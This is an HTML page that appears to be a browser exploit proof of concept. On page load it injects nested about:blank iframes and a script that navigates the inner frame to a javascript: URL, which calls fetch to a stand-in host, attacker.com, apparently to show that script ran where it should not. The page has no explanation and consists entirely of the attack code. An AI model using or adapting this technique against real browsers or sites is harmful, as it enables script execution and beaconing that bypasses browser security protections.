<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGtSrPAGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGtSrPAGGGGG.onload=_=>GGGGGtSrPAGGGGG.contentDocument.body.innerHTML+="<iframe id=GGGGtSrPAGGGG src=about:blank><\/iframe><script>GGGGtSrPAGGGG.addEventListener('load',()=>{GGGGtSrPAGGGG.contentWindow.location.href='javascript:fetch(`https://attacker.com/report/report`)';},{once:true});<\/script>";GGGGGtSrPAGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>